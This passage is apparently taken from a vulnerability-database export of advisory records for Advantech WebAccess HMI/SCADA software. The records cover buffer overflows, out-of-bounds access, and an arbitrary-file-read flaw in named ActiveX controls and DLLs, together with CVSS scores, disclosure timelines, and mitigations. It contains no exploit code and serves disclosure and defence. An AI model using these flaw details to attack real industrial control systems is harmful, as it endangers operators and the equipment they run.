Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": "eq", "trust": 1.1, "vendor": "advantech", "version": "0" }, { "_id": null, "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null } ], "sources": [ { "db": "IVD", "id": "e2f37e31-39ab-11e9-b9f2-000c29342cb1" }, { "db": "ZDI", "id": "ZDI-17-525" }, { "db": "CNVD", "id": "CNVD-2018-11442" }, { "db": "BID", "id": "100221" } ] }, "credits": { "_id": null, "data": "Anonymous", "sources": [ { "db": "ZDI", "id": "ZDI-17-525" } ], "trust": 0.7 }, "cvss": { "_id": null, "data": [ { "cvssV2": [ { "acInsufInfo": null, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "ZDI-17-525", "impactScore": 6.4, "integrityImpact": "PARTIAL", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2018-11442", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "e2f37e31-39ab-11e9-b9f2-000c29342cb1", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" } ], "cvssV3": [], "severity": [ { "author": "ZDI", "id": "ZDI-17-525", "trust": 0.7, "value": "HIGH" }, { "author": "CNVD", "id": "CNVD-2018-11442", "trust": 0.6, "value": "HIGH" }, { "author": "IVD", "id": "e2f37e31-39ab-11e9-b9f2-000c29342cb1", "trust": 0.2, "value": "HIGH" } ] } ], "sources": [ { "db": "IVD", "id": "e2f37e31-39ab-11e9-b9f2-000c29342cb1" }, { "db": "ZDI", "id": "ZDI-17-525" }, { "db": "CNVD", "id": "CNVD-2018-11442" } ] }, "description": { "_id": null, "data": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within nvA1Media.ocx. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. A stack buffer overflow vulnerability exists in Advantech WebAccess \u0027nvA1Media.ocx\u0027. Failed exploit attempts will likely cause a denial-of-service condition", "sources": [ { "db": "ZDI", "id": "ZDI-17-525" }, { "db": "CNVD", "id": "CNVD-2018-11442" }, { "db": "BID", "id": "100221" }, { "db": "IVD", "id": "e2f37e31-39ab-11e9-b9f2-000c29342cb1" } ], "trust": 1.62 }, "external_ids": { "_id": null, "data": [ { "db": "ZDI", "id": "ZDI-17-525", "trust": 1.6 }, { "db": "BID", "id": "100221", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2018-11442", "trust": 0.8 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-4101", "trust": 0.7 }, { "db": "IVD", "id": "E2F37E31-39AB-11E9-B9F2-000C29342CB1", "trust": 0.2 } ], "sources": [ { "db": "IVD", "id": "e2f37e31-39ab-11e9-b9f2-000c29342cb1" }, { "db": "ZDI", "id": "ZDI-17-525" }, { "db": "CNVD", "id": "CNVD-2018-11442" }, { "db": "BID", "id": "100221" } ] }, "id": "VAR-201806-1814", "iot": { "_id": null, "data": true, "sources": [ { "db": "IVD", "id": "e2f37e31-39ab-11e9-b9f2-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-11442" } ], "trust": 1.2173957400000002 }, "iot_taxonomy": { "_id": null, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "e2f37e31-39ab-11e9-b9f2-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-11442" } ] }, "last_update_date": "2022-05-17T01:52:35.298000Z", "patch": { "_id": null, "data": [ { "title": "This vulnerability is being disclosed publicly without a patch in accordance with the ZDI 120 day deadline.11/08/2016, 11/09/2016, 11/10/2016 and 11/15/2016 - ZDI disclosed the reports, 44 in all, to ICS-CERT11/09/2016 - The vendor acknowledged receipt of the report through ICS-CERT and ICS-CERT provided ICS-VU-71410304/27/2017 - ICS-CERT notified ZDI these might be fixed in the latest version and asked would ZDI re-test05/03/2017 - ZDI replied that we cannot do the testing for AdvantechICS-CERT did not respond06/23/2017 - ZDI wrote to ICS-CERT requesting any available update07/31/2017 - ZDI wrote to ICS-CERT requesting any available update08/01/2017 - ZDI wrote to ICS-CERT advising of the intent to 0-day-- Mitigation:Given the nature of the vulnerability, the only salient mitigation strategy is to restrict interaction with the service to trusted machines. Only the clients and servers that have a legitimate procedural relationship with the service should be permitted to communicate with it. This could be accomplished in a number of ways, most notably with firewall rules/whitelisting. These features are available in the native Windows Firewall, as described in and numerous other Microsoft Knowledge Base articles.", "trust": 0.7, "url": "http://technet.microsoft.com/en-us/library/cc725770%28ws.10%29.aspx" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-525" } ] }, "references": { "_id": null, "data": [ { "trust": 0.9, "url": "https://www.zerodayinitiative.com/advisories/zdi-17-525/" }, { "trust": 0.7, "url": "http://technet.microsoft.com/en-us/library/cc725770%28ws.10%29.aspx" }, { "trust": 0.6, "url": "http://www.securityfocus.com/bid/100221" }, { "trust": 0.3, "url": "http://webaccess.advantech.com" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-525" }, { "db": "CNVD", "id": "CNVD-2018-11442" }, { "db": "BID", "id": "100221" } ] }, "sources": { "_id": null, "data": [ { "db": "IVD", "id": "e2f37e31-39ab-11e9-b9f2-000c29342cb1", "ident": null }, { "db": "ZDI", "id": "ZDI-17-525", "ident": null }, { "db": "CNVD", "id": "CNVD-2018-11442", "ident": null }, { "db": "BID", "id": "100221", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2018-06-13T00:00:00", "db": "IVD", "id": "e2f37e31-39ab-11e9-b9f2-000c29342cb1", "ident": null }, { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": "ZDI-17-525", "ident": null }, { "date": "2018-06-13T00:00:00", "db": "CNVD", "id": "CNVD-2018-11442", "ident": null }, { "date": "2017-08-07T00:00:00", "db": "BID", "id": "100221", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": "ZDI-17-525", "ident": null }, { "date": "2018-06-13T00:00:00", "db": "CNVD", "id": "CNVD-2018-11442", "ident": null }, { "date": "2017-08-07T00:00:00", "db": "BID", "id": "100221", "ident": null } ] }, "threat_type": { "_id": null, "data": "network", "sources": [ { "db": "BID", "id": "100221" } ], "trust": 0.3 }, "title": { "_id": null, "data": "Advantech WebAccess \u0027nvA1Media.ocx\u0027 Stack Buffer Overflow Vulnerability", "sources": [ { "db": "IVD", "id": "e2f37e31-39ab-11e9-b9f2-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-11442" }, { "db": "BID", "id": "100221" } ], "trust": 1.1 }, "type": { "_id": null, "data": "Boundary Condition Error", "sources": [ { "db": "BID", "id": "100221" } ], "trust": 0.3 } }
var-201404-0546
Vulnerability from variot
The OpenUrlToBuffer method in the BWOCXRUN.BwocxrunCtrl.1 ActiveX control in bwocxrun.ocx in Advantech WebAccess before 7.2 allows remote attackers to read arbitrary files via a file: URL. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the bwocxrun.ocx cntrol. Advantech WebAccess HMI/SCADA is an HMI/SCADA software. Advantech WebAccess is prone to an information-disclosure vulnerability. An attacker can exploit this issue to gain access to sensitive information; this may lead to further attacks. Advantech WebAccess 7.1 and prior are vulnerable. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": "eq", "trust": 1.6, "vendor": "advantech", "version": "5.0" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 1.6, "vendor": "advantech", "version": "7.0" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 1.6, "vendor": "advantech", "version": "6.0" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 1.2, "vendor": "advantech", "version": "7.1" }, { "_id": null, "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "7.1" }, { "_id": null, "model": "webaccess", "scope": "lt", "trust": 0.8, "vendor": "advantech", "version": "7.2" }, { "_id": null, "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null }, { "_id": null, "model": null, "scope": "eq", "trust": 0.6, "vendor": "advantech webaccess", "version": "5.0" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.6, "vendor": "advantech webaccess", "version": "6.0" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.6, "vendor": "advantech webaccess", "version": "7.0" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.6, "vendor": "advantech webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "7271c1ce-1edf-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "7d7bf370-463f-11e9-80e2-000c29342cb1" }, { "db": "IVD", "id": "166da128-2352-11e6-abef-000c29c66e3d" }, { "db": "ZDI", "id": "ZDI-14-137" }, { "db": "CNVD", "id": "CNVD-2014-02264" }, { "db": "JVNDB", "id": "JVNDB-2014-001981" }, { "db": "CNNVD", "id": "CNNVD-201404-176" }, { "db": "NVD", "id": "CVE-2014-0771" } ] }, "configurations": { "_id": null, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-001981" } ] }, "credits": { "_id": null, "data": "Anonymous", "sources": [ { "db": "ZDI", "id": "ZDI-14-137" } ], "trust": 0.7 }, "cve": "CVE-2014-0771", "cvss": { "_id": null, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CVE-2014-0771", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 2.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2014-02264", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "7271c1ce-1edf-11e6-abef-000c29c66e3d", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "7d7bf370-463f-11e9-80e2-000c29342cb1", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "166da128-2352-11e6-abef-000c29c66e3d", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "VHN-68264", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:N", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2014-0771", "trust": 1.0, "value": "MEDIUM" }, { "author": "NVD", "id": "CVE-2014-0771", "trust": 0.8, "value": "Medium" }, { "author": "ZDI", "id": "CVE-2014-0771", "trust": 0.7, "value": "MEDIUM" }, { "author": "CNVD", "id": "CNVD-2014-02264", "trust": 0.6, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201404-176", "trust": 0.6, "value": "MEDIUM" }, { "author": "IVD", "id": "7271c1ce-1edf-11e6-abef-000c29c66e3d", "trust": 0.2, "value": "MEDIUM" }, { "author": "IVD", "id": "7d7bf370-463f-11e9-80e2-000c29342cb1", "trust": 0.2, "value": "MEDIUM" }, { "author": "IVD", "id": "166da128-2352-11e6-abef-000c29c66e3d", "trust": 0.2, "value": "MEDIUM" }, { "author": "VULHUB", "id": "VHN-68264", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "IVD", "id": "7271c1ce-1edf-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "7d7bf370-463f-11e9-80e2-000c29342cb1" }, { "db": "IVD", "id": "166da128-2352-11e6-abef-000c29c66e3d" }, { "db": "ZDI", "id": "ZDI-14-137" }, { "db": "CNVD", "id": "CNVD-2014-02264" }, { "db": "VULHUB", "id": "VHN-68264" }, { "db": "JVNDB", "id": "JVNDB-2014-001981" }, { "db": "CNNVD", "id": "CNNVD-201404-176" }, { "db": "NVD", "id": "CVE-2014-0771" } ] }, "description": { "_id": null, "data": "The OpenUrlToBuffer method in the BWOCXRUN.BwocxrunCtrl.1 ActiveX control in bwocxrun.ocx in Advantech WebAccess before 7.2 allows remote attackers to read arbitrary files via a file: URL. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the bwocxrun.ocx cntrol. Advantech WebAccess HMI/SCADA is an HMI/SCADA software. Advantech WebAccess is prone to an information-disclosure vulnerability. \nAn attacker can exploit this issue to gain access to sensitive information; this may lead to further attacks. \nAdvantech WebAccess 7.1 and prior are vulnerable. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment", "sources": [ { "db": "NVD", "id": "CVE-2014-0771" }, { "db": "JVNDB", "id": "JVNDB-2014-001981" }, { "db": "ZDI", "id": "ZDI-14-137" }, { "db": "CNVD", "id": "CNVD-2014-02264" }, { "db": "BID", "id": "66750" }, { "db": "IVD", "id": "7271c1ce-1edf-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "7d7bf370-463f-11e9-80e2-000c29342cb1" }, { "db": "IVD", "id": "166da128-2352-11e6-abef-000c29c66e3d" }, { "db": "VULHUB", "id": "VHN-68264" } ], "trust": 3.69 }, "external_ids": { "_id": null, "data": [ { "db": "NVD", "id": "CVE-2014-0771", "trust": 4.7 }, { "db": "ICS CERT", "id": "ICSA-14-079-03", "trust": 3.1 }, { "db": "CNNVD", "id": "CNNVD-201404-176", "trust": 1.3 }, { "db": "CNVD", "id": "CNVD-2014-02264", "trust": 1.2 }, { "db": "BID", "id": "66750", "trust": 1.0 }, { "db": "JVNDB", "id": "JVNDB-2014-001981", "trust": 0.8 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-2093", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-14-137", "trust": 0.7 }, { "db": "OSVDB", "id": "105569", "trust": 0.6 }, { "db": "SECUNIA", "id": "57873", "trust": 0.6 }, { "db": "IVD", "id": "7271C1CE-1EDF-11E6-ABEF-000C29C66E3D", "trust": 0.2 }, { "db": "IVD", "id": "7D7BF370-463F-11E9-80E2-000C29342CB1", "trust": 0.2 }, { "db": "IVD", "id": "166DA128-2352-11E6-ABEF-000C29C66E3D", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-68264", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "7271c1ce-1edf-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "7d7bf370-463f-11e9-80e2-000c29342cb1" }, { "db": "IVD", "id": "166da128-2352-11e6-abef-000c29c66e3d" }, { "db": "ZDI", "id": "ZDI-14-137" }, { "db": "CNVD", "id": "CNVD-2014-02264" }, { "db": "VULHUB", "id": "VHN-68264" }, { "db": "BID", "id": "66750" }, { "db": "JVNDB", "id": "JVNDB-2014-001981" }, { "db": "CNNVD", "id": "CNNVD-201404-176" }, { "db": "NVD", "id": "CVE-2014-0771" } ] }, "id": "VAR-201404-0546", "iot": { "_id": null, "data": true, "sources": [ { "db": "IVD", "id": "7271c1ce-1edf-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "7d7bf370-463f-11e9-80e2-000c29342cb1" }, { "db": "IVD", "id": "166da128-2352-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-02264" }, { "db": "VULHUB", "id": "VHN-68264" } ], "trust": 1.73470696 }, "iot_taxonomy": { "_id": null, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 1.2 } ], "sources": [ { "db": "IVD", "id": "7271c1ce-1edf-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "7d7bf370-463f-11e9-80e2-000c29342cb1" }, { "db": "IVD", "id": "166da128-2352-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-02264" } ] }, "last_update_date": "2024-11-23T21:45:11.538000Z", "patch": { "_id": null, "data": [ { "title": "Downloads ::: WebAccess Software", "trust": 0.8, "url": "http://webaccess.advantech.com/downloads.php?item=software" }, { "title": "Advantech WebAccess", "trust": 0.8, "url": "http://www.advantech.co.jp/products/GF-1M94V/Advantech-WebAccess/mod_B975C492-56B3-4EBA-8BBB-5B6D3483EE9D.aspx" }, { "title": "Advantech has issued an update to correct this vulnerability.", "trust": 0.7, "url": "https://ics-cert.us-cert.gov/advisories/ICSA-14-079-03" }, { "title": "Advantech WebAccess bwocxrun.ocx patch for arbitrary file access vulnerabilities", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/44788" }, { "title": "AdvantechWebAccessCHNNode_2014.03.03_3.3.1", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=49251" } ], "sources": [ { "db": "ZDI", "id": "ZDI-14-137" }, { "db": "CNVD", "id": "CNVD-2014-02264" }, { "db": "JVNDB", "id": "JVNDB-2014-001981" }, { "db": "CNNVD", "id": "CNNVD-201404-176" } ] }, "problemtype_data": { "_id": null, "data": [ { "problemtype": "CWE-200", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-68264" }, { "db": "JVNDB", "id": "JVNDB-2014-001981" }, { "db": "NVD", "id": "CVE-2014-0771" } ] }, "references": { "_id": null, "data": [ { "trust": 3.8, "url": "http://ics-cert.us-cert.gov/advisories/icsa-14-079-03" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0771" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-0771" }, { "trust": 0.6, "url": "http://osvdb.com/show/osvdb/105569" }, { "trust": 0.6, "url": "http://secunia.com/advisories/57873" } ], "sources": [ { "db": "ZDI", "id": "ZDI-14-137" }, { "db": "CNVD", "id": "CNVD-2014-02264" }, { "db": "VULHUB", "id": "VHN-68264" }, { "db": "JVNDB", "id": "JVNDB-2014-001981" }, { "db": "CNNVD", "id": "CNNVD-201404-176" }, { "db": "NVD", "id": "CVE-2014-0771" } ] }, "sources": { "_id": null, "data": [ { "db": "IVD", "id": "7271c1ce-1edf-11e6-abef-000c29c66e3d", "ident": null }, { "db": "IVD", "id": "7d7bf370-463f-11e9-80e2-000c29342cb1", "ident": null }, { "db": "IVD", "id": "166da128-2352-11e6-abef-000c29c66e3d", "ident": null }, { "db": "ZDI", "id": "ZDI-14-137", "ident": null }, { "db": "CNVD", "id": "CNVD-2014-02264", "ident": null }, { "db": "VULHUB", "id": "VHN-68264", "ident": null }, { "db": "BID", "id": "66750", "ident": null }, { "db": "JVNDB", "id": "JVNDB-2014-001981", "ident": null }, { "db": "CNNVD", "id": "CNNVD-201404-176", "ident": null }, { "db": "NVD", "id": "CVE-2014-0771", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2014-04-11T00:00:00", "db": "IVD", "id": "7271c1ce-1edf-11e6-abef-000c29c66e3d", "ident": null }, { "date": "2014-04-11T00:00:00", "db": "IVD", "id": "7d7bf370-463f-11e9-80e2-000c29342cb1", "ident": null }, { "date": "2014-04-11T00:00:00", "db": "IVD", "id": "166da128-2352-11e6-abef-000c29c66e3d", "ident": null }, { "date": "2014-05-19T00:00:00", "db": "ZDI", "id": "ZDI-14-137", "ident": null }, { "date": "2014-04-11T00:00:00", "db": "CNVD", "id": "CNVD-2014-02264", "ident": null }, { "date": "2014-04-12T00:00:00", "db": "VULHUB", "id": "VHN-68264", "ident": null }, { "date": "2014-04-08T00:00:00", "db": "BID", "id": "66750", "ident": null }, { "date": "2014-04-15T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-001981", "ident": null }, { "date": "2014-04-15T00:00:00", "db": "CNNVD", "id": "CNNVD-201404-176", "ident": null }, { "date": "2014-04-12T04:37:31.643000", "db": "NVD", "id": "CVE-2014-0771", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2014-05-19T00:00:00", "db": "ZDI", "id": "ZDI-14-137", "ident": null }, { "date": "2014-04-11T00:00:00", "db": "CNVD", "id": "CNVD-2014-02264", "ident": null }, { "date": "2014-04-14T00:00:00", "db": "VULHUB", "id": "VHN-68264", "ident": null }, { "date": "2014-04-08T00:00:00", "db": "BID", "id": "66750", "ident": null }, { "date": "2014-04-15T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-001981", "ident": null }, { "date": "2014-04-15T00:00:00", "db": "CNNVD", "id": "CNNVD-201404-176", "ident": null }, { "date": "2024-11-21T02:02:46.837000", "db": "NVD", "id": "CVE-2014-0771", "ident": null } ] }, "threat_type": { "_id": null, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201404-176" } ], "trust": 0.6 }, "title": { "_id": null, "data": "Advantech WebAccess bwocxrun.ocx Arbitrary File Access Vulnerability", "sources": [ { "db": "IVD", "id": "7271c1ce-1edf-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "7d7bf370-463f-11e9-80e2-000c29342cb1" }, { "db": "IVD", "id": "166da128-2352-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-02264" } ], "trust": 1.2 }, "type": { "_id": null, "data": "Information leakage", "sources": [ { "db": "IVD", "id": "7271c1ce-1edf-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "7d7bf370-463f-11e9-80e2-000c29342cb1" }, { "db": "IVD", "id": "166da128-2352-11e6-abef-000c29c66e3d" } ], "trust": 0.6 } }
var-201708-1691
Vulnerability from variot
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within nvA1Media.ocx. The issue results from the lack of proper validation of user-supplied data which can result in a memory access outside an allocated buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process.
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-554" } ] }, "credits": { "_id": null, "data": "Anonymous", "sources": [ { "db": "ZDI", "id": "ZDI-17-554" } ], "trust": 0.7 }, "cvss": { "_id": null, "data": [ { "cvssV2": [ { "acInsufInfo": null, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "ZDI-17-554", "impactScore": 6.4, "integrityImpact": "PARTIAL", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "ZDI", "id": "ZDI-17-554", "trust": 0.7, "value": "HIGH" } ] } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-554" } ] }, "description": { "_id": null, "data": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within nvA1Media.ocx. The issue results from the lack of proper validation of user-supplied data which can result in a memory access outside an allocated buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process.", "sources": [ { "db": "ZDI", "id": "ZDI-17-554" } ], "trust": 0.7 }, "external_ids": { "_id": null, "data": [ { "db": "ZDI_CAN", "id": "ZDI-CAN-4074", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-17-554", "trust": 0.7 } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-554" } ] }, "id": "VAR-201708-1691", "iot": { "_id": null, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.41739574 }, "last_update_date": "2022-05-17T02:04:30.844000Z", "patch": { "_id": null, "data": [ { "title": "This vulnerability is being disclosed publicly without a patch in accordance with the ZDI 120 day deadline.11/08/2016, 11/09/2016, 11/10/2016 and 11/15/2016 - ZDI disclosed the reports, 44 in all, to ICS-CERT11/09/2016 - The vendor acknowledged receipt of the report through ICS-CERT and ICS-CERT provided ICS-VU-71410304/27/2017 - ICS-CERT notified ZDI these might be fixed in the latest version and asked would ZDI re-test05/03/2017 - ZDI replied that we cannot do the testing for AdvantechICS-CERT did not respond06/23/2017 - ZDI wrote to ICS-CERT requesting any available update07/31/2017 - ZDI wrote to ICS-CERT requesting any available update08/01/2017 - ZDI wrote to ICS-CERT advising of the intent to 0-day-- Mitigation:The killbit can be set on this control to disable scripting within Internet Explorer by modifying the data value of the Compatibility Flags DWORD within the following location in the registry:HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\E19E79EC-F62E-40A0-952D-E49AEC7BEC2FIf the Compatibility Flags value is set to 0x00000400, the control can no longer be instantiated inside the browser.For more information, please see: ", "trust": 0.7, "url": "http://support.microsoft.com/kb/240797" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-554" } ] }, "references": { "_id": null, "data": [ { "trust": 0.7, "url": "http://support.microsoft.com/kb/240797" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-554" } ] }, "sources": { "_id": null, "data": [ { "db": "ZDI", "id": "ZDI-17-554", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": "ZDI-17-554", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": "ZDI-17-554", "ident": null } ] }, "title": { "_id": null, "data": "(0Day) Advantech WebAccess nvA1Media GetMDInterval Out-Of-Bounds Access Remote Code Execution Vulnerability", "sources": [ { "db": "ZDI", "id": "ZDI-17-554" } ], "trust": 0.7 } }
var-201708-1692
Vulnerability from variot
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within RtspVapgDecoderNew2.dll. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process.
